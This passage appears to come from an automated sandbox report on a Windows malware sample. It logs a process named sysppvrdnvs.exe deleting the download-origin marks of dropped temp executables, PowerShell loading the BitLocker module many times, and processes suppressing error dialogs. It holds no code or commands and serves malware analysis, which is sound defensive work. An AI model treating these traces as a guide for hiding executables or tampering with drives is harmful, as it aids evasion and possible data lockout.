                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\1881231804.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\2314627202.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\1091722296.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\146916724.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeFile opened: C:\Users\user\AppData\Local\Temp\1239611256.exe:Zone.Identifier read attributes | delete
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\Desktop\Us051y7j25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\2314627202.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
